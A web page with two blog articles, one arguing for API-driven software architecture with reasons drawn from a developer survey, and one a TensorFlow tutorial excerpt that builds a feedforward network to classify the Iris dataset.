Everyday, we see a new architecture popping up, being labeled as a modern architecture for application development. That’s what happened with Microservices in the beginning, and then all went for a toss when they were termed as a design pattern rather than an architecture on a whole. APIs are growing in popularity and are even being used as a basis to draw out the architecture of applications. We’re going to try and understand what some of the top factors are, which make Architects (and Developers) appreciate API driven architectures over the other “modern” and upcoming architectures. Before we get to the reasons, let’s understand where I’m coming from in the first place. So, we recently published our findings from the Skill Up survey that we conducted for 8,000 odd IT pros. We asked them various questions ranging from what their favourite tools were, to whether they felt they knew more than what their managers did. Of the questions, one of them was directed to find out which of the modern architectures interested them the most. The choices were among Chaos Engineering, API Driven Architecture and Evolutionary Architecture. Source: Skill Up 2018 From the results, it's evident that they’re more inclined towards API driven Architecture. Or maybe, those who didn’t really find the architecture of their choice among the lot, simply chose API driven to be the best of the lot. But why do architects love API driven development? Anyway, I’ve been thinking about it a bit and thought I would come up with a few reasons as to why this might be so. So here goes… Reason #1: The big split between the backend and frontend Also known as Split Stack Development, API driven architecture allows for the backend and frontend of the application to be decoupled. This allows developers and architects to mitigate any dependencies that each end might have or rather impose on the other. Instead of having the dependencies, each end communicates with the other via APIs. This is extremely beneficial in the sense that each end can be built in completely different tools and technologies. For example, the backend could be in Python/Java, while the front end is built in JavaScript. Reason #2: Sensibility in scalability When APIs are the foundation of an architecture, it enables the organisation to scale the app by simply plugging in services as and when needed, instead of having to modify the app itself. This is a great way to plugin and plugout functionality as and when needed without disrupting the original architecture. Reason #3: Parallel Development aka Agile When different teams work on the front and back end of the application, there’s no reason for them to be working together. That doesn’t mean they don’t work together at all, rather, what I mean is that the only factor they have to agree upon is the API structure and nothing else. This is because of Reason #1, where both layers of the architecture are disconnected or decoupled. This enables teams to be more flexible and agile when developing the application. It is only at the testing and deployment stages that the teams will collaborate more. Reason #4: API as a product This is more of a business case, rather than developer centric, but I thought I should add it in anyway. So, there’s something new that popped up on the Thoughtworks Radar, a few months ago - API-as-a-product.  As a matter of fact, you could consider this similar to API-as-a-Service. Organisations like Salesforce have been offering their services in the form of APIs. 
Reason #4: API as a product

This is more of a business case than a developer-centric one, but I thought I should add it in anyway. Something new popped up on the Thoughtworks Radar a few months ago: API-as-a-product. You could consider it similar to API-as-a-Service. Organisations like Salesforce have been offering their services in the form of APIs. For example, suppose you're using Salesforce CRM and you want to extend its functionality; all you need to do is use its APIs to extend the system. Google is another good example of a company that offers APIs as products. This is a great way to provide extensibility instead of building a separate application altogether. Individual APIs, or groups of them, can be priced with subscription plans. These plans cover not only access to the APIs themselves, but also a defined number of calls or amount of data allowed.

Reason #5: Hiding underlying complexity

In an API driven architecture, all components connected to the API are modular, exist on their own and communicate via the API. The modular nature of the application makes it easier to test and maintain. Moreover, if you're consuming someone else's API, you needn't learn or decipher how the entire codebase works; you can just plug the API in and use it. That reduces complexity to a great extent.

Reason #6: Business Logic comes first

API driven architecture allows developers to focus on the business logic rather than having to worry about structuring the application. The initial API structure is all that needs to be planned out, after which each team goes off and develops its individual APIs. This greatly reduces development time as well.

Reason #7: IoT loves APIs

API architecture makes for a great way to build IoT applications, as IoT needs a great deal of scalability. An application built on a foundation of APIs is a dream for IoT developers, as devices can be easily connected to the mother app. I expect everything to be connected via APIs in the next 5 years. If it doesn't happen, you can always get back at me in the comments section! ;)

Reason #8: APIs and DevOps are a match made in Heaven

APIs allow for a more streamlined deployment pipeline, while also eliminating the production of duplicate assets by development teams. Moreover, deployments can reach production a lot faster through these slick pipelines, increasing efficiency and reducing costs by a great deal. The merger of DevOps and API driven architecture, however, is not a walk in the park, as it requires a change in mindset. Teams need to change culturally, to become enablers of reusable, self-service consumption.

The other side of the coin

There are always two sides to a coin, and API driven architecture has some drawbacks. For starters, you'll have APIs all over the place! While that was the point in the first place, it becomes really tedious to manage all those APIs. Secondly, when you have things running in parallel, you require a lot of processing power: more cores, more infrastructure. Another important issue is security. With so many cyber attacks and privacy breaches, an API driven architecture only invites trouble by giving hackers more doors to open.

Flipside aside, those were some of the reasons I could think of as to why architects would be interested in an API driven architecture. APIs give customers, both internal and external stakeholders, the freedom to leverage the enterprise's assets while customizing as required. In a way, APIs aren't just a means of integration and connectivity for large enterprise apps. Rather, they should be looked at as a way to drive faster and more modern software architecture and delivery.

What are web developers favorite front-end tools?
The best backend tools in web development
The 10 most common types of DoS attacks you need to know

Implementing feedforward networks with TensorFlow

Aarthi Kumaraswamy
07 Jun 2018
12 min read
Deep feedforward networks, also called feedforward neural networks, are sometimes also referred to as Multilayer Perceptrons (MLPs). The goal of a feedforward network is to approximate some function f∗. For example, for a classifier, y = f∗(x) maps an input x to a label y. A feedforward network defines a mapping from input to label, y = f(x; θ), and learns the value of the parameters θ that results in the best function approximation.

This tutorial is an excerpt from the book, Neural Network Programming with Tensorflow by Manpreet Singh Ghotra and Rajdeep Dua. With this book, learn how to implement more advanced neural networks like CNNs, RNNs, GANs, deep belief networks and others in Tensorflow.

How do feedforward networks work?

Feedforward networks are a conceptual stepping stone on the path to recurrent networks, which power many natural language applications. Feedforward neural networks are called networks because they are built by composing together many different functions. The model is associated with a directed acyclic graph describing how these functions are composed. For example, three functions f(1), f(2), and f(3) can be connected to form f(x) = f(3)(f(2)(f(1)(x))). These chain structures are the most commonly used structures of neural networks. In this case, f(1) is called the first layer of the network, f(2) is called the second layer, and so on. The overall length of the chain gives the depth of the model; it is from this terminology that the name deep learning arises. The final layer of a feedforward network is called the output layer.

Diagram showing various functions activated on input x to form a neural network.

These networks are called neural because they are inspired by neuroscience. Each hidden layer is a vector, and the dimensionality of these hidden layers determines the width of the model.
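To see the chain f(x) = f(3)(f(2)(f(1)(x))) in code before moving on to TensorFlow, here is a minimal NumPy sketch. It is not from the book; the layer sizes and random weights are arbitrary, chosen only to show that each layer is just a function applied to the previous layer's output.

import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

# Arbitrary sizes: 4 inputs -> 8 hidden -> 8 hidden -> 3 outputs
rng = np.random.default_rng(0)
W1 = rng.normal(size=(4, 8))
W2 = rng.normal(size=(8, 8))
W3 = rng.normal(size=(8, 3))

def f1(x): return sigmoid(x @ W1)   # first layer
def f2(h): return sigmoid(h @ W2)   # second layer
def f3(h): return h @ W3            # output layer

x = rng.normal(size=(1, 4))         # a single input sample
y = f3(f2(f1(x)))                   # the chain f(x) = f3(f2(f1(x)))
print(y.shape)                      # (1, 3)

The length of this chain (three layers) is the depth of the model, and the size of the hidden vectors (8 here) is its width.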
Implementing feedforward networks with TensorFlow

Feedforward networks can be easily implemented using TensorFlow by defining placeholders for the inputs and labels, computing the activation values, and using them to calculate predictions. Let's take an example of classification with a feedforward network:

X = tf.placeholder("float", shape=[None, x_size])
y = tf.placeholder("float", shape=[None, y_size])
weights_1 = initialize_weights((x_size, hidden_size), stddev)
weights_2 = initialize_weights((hidden_size, y_size), stddev)
sigmoid = tf.nn.sigmoid(tf.matmul(X, weights_1))
y = tf.matmul(sigmoid, weights_2)

Once the predicted value tensor has been defined, we calculate the cost function:

cost = tf.reduce_mean(tf.nn.OPERATION_NAME(labels=<actual value>, logits=<predicted value>))
updates_sgd = tf.train.GradientDescentOptimizer(sgd_step).minimize(cost)

Here, OPERATION_NAME could be one of the following:

tf.nn.sigmoid_cross_entropy_with_logits: Calculates sigmoid cross entropy on the incoming logits and labels:

sigmoid_cross_entropy_with_logits(
    _sentinel=None,
    labels=None,
    logits=None,
    name=None
)

_sentinel: Used to prevent positional parameters. Internal, do not use.
labels: A tensor of the same type and shape as logits.
logits: A tensor of type float32 or float64.

The formula implemented is (with x = logits and z = labels): max(x, 0) - x * z + log(1 + exp(-abs(x))).

tf.nn.softmax: Performs softmax activation on the incoming tensor. This only normalizes so that all the probabilities in a tensor row add up to one; it cannot be used directly as a classification cost.

softmax = exp(logits) / reduce_sum(exp(logits), dim)

logits: A non-empty tensor. Must be one of the following types: half, float32, or float64.
dim: The dimension softmax will be performed on. The default is -1, which indicates the last dimension.
name: A name for the operation (optional).

tf.nn.log_softmax: Calculates the log of the softmax function. This, too, is just a normalization function.

log_softmax(
    logits,
    dim=-1,
    name=None
)

logits: A non-empty tensor. Must be one of the following types: half, float32, or float64.
dim: The dimension softmax will be performed on. The default is -1, which indicates the last dimension.
name: A name for the operation (optional).

tf.nn.softmax_cross_entropy_with_logits: Computes softmax cross entropy between logits and labels. While the classes are mutually exclusive, their probabilities need not be; all that is required is that each row of labels is a valid probability distribution. For exclusive labels (where one and only one class is true at a time), use sparse_softmax_cross_entropy_with_logits.

softmax_cross_entropy_with_logits(
    _sentinel=None,
    labels=None,
    logits=None,
    dim=-1,
    name=None
)

_sentinel: Used to prevent positional parameters. For internal use only.
labels: Each row labels[i] must be a valid probability distribution.
logits: Unscaled log probabilities.
dim: The class dimension. Defaults to -1, which is the last dimension.
name: A name for the operation (optional).

tf.nn.sparse_softmax_cross_entropy_with_logits: Computes sparse softmax cross entropy between logits and labels. The probability of a given label is considered exclusive: soft classes are not allowed, and the labels vector must provide a single specific index for the true class for each row of logits.

sparse_softmax_cross_entropy_with_logits(
    _sentinel=None,
    labels=None,
    logits=None,
    name=None
)

labels: Tensor of shape [d_0, d_1, ..., d_(r-1)] (where r is the rank of labels and result) and dtype int32 or int64. Each entry in labels must be an index in [0, num_classes). Other values will raise an exception when this operation is run on the CPU, and return NaN for the corresponding loss and gradient rows on the GPU.
logits: Unscaled log probabilities of shape [d_0, d_1, ..., d_(r-1), num_classes] and dtype float32 or float64.

tf.nn.weighted_cross_entropy_with_logits: This is similar to sigmoid_cross_entropy_with_logits(), except that pos_weight allows a trade-off between recall and precision by up- or down-weighting the cost of a positive error relative to a negative error.

weighted_cross_entropy_with_logits(
    targets,
    logits,
    pos_weight,
    name=None
)

targets: A tensor of the same type and shape as logits.
logits: A tensor of type float32 or float64.
pos_weight: A coefficient to use on the positive examples.
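To illustrate the difference between the two softmax cross-entropy losses above, the following short sketch (assuming the same TensorFlow 1.x API used throughout this excerpt; the logits and labels are made-up values) computes the same per-example loss twice: once from one-hot labels and once from integer class indices.

import tensorflow as tf

logits = tf.constant([[2.0, 0.5, -1.0],
                      [0.1, 0.2, 3.0]])          # unscaled scores: 2 samples, 3 classes
onehot_labels = tf.constant([[1.0, 0.0, 0.0],
                             [0.0, 0.0, 1.0]])   # one-hot targets
sparse_labels = tf.constant([0, 2])              # the same targets as class indices

dense_loss = tf.nn.softmax_cross_entropy_with_logits(labels=onehot_labels, logits=logits)
sparse_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sparse_labels, logits=logits)

with tf.Session() as sess:
    print(sess.run(dense_loss))    # per-example cross entropy from one-hot labels
    print(sess.run(sparse_loss))   # the same values, computed from indices

Both calls produce the same per-example losses; the sparse variant simply saves you the one-hot encoding step. The Iris example that follows one-hot encodes its targets and therefore uses the dense variant.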
Analyzing the Iris dataset with a Tensorflow feedforward network

Let's look at a feedforward example using the Iris dataset. You can download the dataset from https://github.com/ml-resources/neuralnetwork-programming/blob/ed1/ch02/iris/iris.csv and the target labels from https://github.com/ml-resources/neuralnetwork-programming/blob/ed1/ch02/iris/target.csv.

The Iris dataset contains 150 rows of data, made up of 50 samples from each of three Iris species: Iris setosa, Iris virginica, and Iris versicolor.

Petal geometry compared for the three iris species: Iris Setosa, Iris Virginica, and Iris Versicolor.

In the dataset, each row contains the data for one flower sample: sepal length, sepal width, petal length, petal width, and flower species. The flower species are stored as integers, with 0 denoting Iris setosa, 1 denoting Iris versicolor, and 2 denoting Iris virginica.

First, we will create a run() function that takes three parameters: the hidden layer size h_size, the standard deviation for the weights stddev, and the step size of stochastic gradient descent sgd_step:

def run(h_size, stddev, sgd_step)

Input data is loaded using NumPy's genfromtxt function. The Iris data has a shape of L: 150 and W: 4 and is loaded into the all_X variable. The target labels are loaded from target.csv into all_y with a shape of L: 150, W: 3:

def load_iris_data():
    from numpy import genfromtxt
    data = genfromtxt('iris.csv', delimiter=',')
    target = genfromtxt('target.csv', delimiter=',').astype(int)
    # Prepend the column of 1s for bias
    L, W = data.shape
    all_X = np.ones((L, W + 1))
    all_X[:, 1:] = data
    num_labels = len(np.unique(target))
    all_y = np.eye(num_labels)[target]
    return train_test_split(all_X, all_y, test_size=0.33, random_state=RANDOMSEED)

Once the data is loaded, we initialize the weight matrices based on x_size, y_size, and h_size, with the standard deviation passed to the run() method. Here, x_size = 5, y_size = 3, and h_size = 128 (or any other number of neurons chosen for the hidden layer):

# Size of Layers
x_size = train_x.shape[1]  # Input nodes: 4 features and 1 bias
y_size = train_y.shape[1]  # Outcomes (3 iris flowers)

# variables
X = tf.placeholder("float", shape=[None, x_size])
y = tf.placeholder("float", shape=[None, y_size])
weights_1 = initialize_weights((x_size, h_size), stddev)
weights_2 = initialize_weights((h_size, y_size), stddev)

Next, we make the prediction using sigmoid as the activation function, defined in the forward_propagation() function:

def forward_propagation(X, weights_1, weights_2):
    sigmoid = tf.nn.sigmoid(tf.matmul(X, weights_1))
    y = tf.matmul(sigmoid, weights_2)
    return y

First, the sigmoid output is calculated from the input X and weights_1. This is then used to calculate y as a matrix multiplication of sigmoid and weights_2:

y_pred = forward_propagation(X, weights_1, weights_2)
predict = tf.argmax(y_pred, dimension=1)

Next, we define the cost function and the optimization using gradient descent. Let's look at the GradientDescentOptimizer being used. It is defined in the tf.train.GradientDescentOptimizer class and implements the gradient descent algorithm. To construct an instance, we use the following constructor and pass sgd_step as a parameter:

# constructor for GradientDescentOptimizer
__init__(
    learning_rate,
    use_locking=False,
    name='GradientDescent'
)

The arguments are explained here:

learning_rate: A tensor or a floating point value. The learning rate to use.
use_locking: If True, use locks for update operations.
name: Optional name prefix for the operations created when applying gradients. The default name is "GradientDescent".

The following code implements the cost function:

cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=y_pred))
updates_sgd = tf.train.GradientDescentOptimizer(sgd_step).minimize(cost)

Next, we will implement the following steps:

1. Initialize the TensorFlow session: sess = tf.Session().
2. Initialize all the variables using tf.initialize_all_variables(); the returned op is then run by the session.
3. Iterate over the steps (1 to 50).
4. For each example in train_x and train_y, execute updates_sgd.
5. Calculate train_accuracy and test_accuracy.
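One gap worth flagging before running these steps: the snippets above call an initialize_weights() helper that the excerpt never defines. A minimal version consistent with how it is called, taking a shape tuple and a standard deviation and returning a trainable variable, might look like this; the book's actual implementation may differ, for example in the distribution it samples from.

# Hypothetical reconstruction of the undefined helper, based on its call sites.
def initialize_weights(shape, stddev):
    weights = tf.random_normal(shape, stddev=stddev)  # assumption: normal initialization
    return tf.Variable(weights)

With that in place, the training loop below can run end to end.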
We stored the accuracy for each step in a list so that we could plot a graph:

init = tf.initialize_all_variables()
steps = 50
sess.run(init)
x = np.arange(steps)
test_acc = []
train_acc = []

print("Step, train accuracy, test accuracy")
for step in range(steps):
    # Train with each example
    for i in range(len(train_x)):
        sess.run(updates_sgd, feed_dict={X: train_x[i: i + 1], y: train_y[i: i + 1]})

    train_accuracy = np.mean(np.argmax(train_y, axis=1) ==
                             sess.run(predict, feed_dict={X: train_x, y: train_y}))
    test_accuracy = np.mean(np.argmax(test_y, axis=1) ==
                            sess.run(predict, feed_dict={X: test_x, y: test_y}))

    print("%d, %.2f%%, %.2f%%"
          % (step + 1, 100. * train_accuracy, 100. * test_accuracy))
    test_acc.append(100. * test_accuracy)
    train_acc.append(100. * train_accuracy)

Code execution

Let's run this code for an h_size of 128, a standard deviation of 0.1, and an sgd_step of 0.01:

def run(h_size, stddev, sgd_step):
    ...

def main():
    run(128, 0.1, 0.01)

if __name__ == '__main__':
    main()

The preceding code outputs a graph plotting the steps against the test and train accuracy.

Let's compare how changing the SGD step size affects training accuracy. The following code is very similar to the previous example, but we rerun it for multiple SGD step values to see how they affect the accuracy levels:

def run(h_size, stddev, sgd_steps):
    ....
    test_accs = []
    train_accs = []
    time_taken_summary = []
    for sgd_step in sgd_steps:
        start_time = time.time()
        updates_sgd = tf.train.GradientDescentOptimizer(sgd_step).minimize(cost)

        sess = tf.Session()
        init = tf.initialize_all_variables()
        steps = 50
        sess.run(init)
        x = np.arange(steps)
        test_acc = []
        train_acc = []

        print("Step, train accuracy, test accuracy")
        for step in range(steps):
            # Train with each example
            for i in range(len(train_x)):
                sess.run(updates_sgd, feed_dict={X: train_x[i: i + 1], y: train_y[i: i + 1]})

            train_accuracy = np.mean(np.argmax(train_y, axis=1) ==
                                     sess.run(predict, feed_dict={X: train_x, y: train_y}))
            test_accuracy = np.mean(np.argmax(test_y, axis=1) ==
                                    sess.run(predict, feed_dict={X: test_x, y: test_y}))

            print("%d, %.2f%%, %.2f%%"
                  % (step + 1, 100. * train_accuracy, 100. * test_accuracy))
            # x.append(step)
            test_acc.append(100. * test_accuracy)
            train_acc.append(100. * train_accuracy)
        end_time = time.time()
        diff = end_time - start_time
        time_taken_summary.append((sgd_step, diff))
        t = [np.array(test_acc)]
        t.append(train_acc)
        train_accs.append(train_acc)

The output of the preceding code is an array with the training and test accuracy for each SGD step value. In our example, we call run() with sgd_steps set to [0.01, 0.02, 0.03]:

def main():
    sgd_steps = [0.01, 0.02, 0.03]
    run(128, 0.1, sgd_steps)

if __name__ == '__main__':
    main()

The resulting plot shows how training accuracy changes with sgd_step: for an SGD step of 0.03, accuracy rises faster because the step size is larger.

In this post, we built our first neural network, which was feedforward only, and used it to classify the contents of the Iris dataset.

You enjoyed a tutorial from the book, Neural Network Programming with Tensorflow. To implement advanced neural networks like CNNs, RNNs, GANs, deep belief networks and others in Tensorflow, grab your copy today!

Neural Network Architectures 101: Understanding Perceptrons
How to Implement a Neural Network with Single-Layer Perceptron
Deep Learning Algorithms: How to classify Irises using multi-layer perceptrons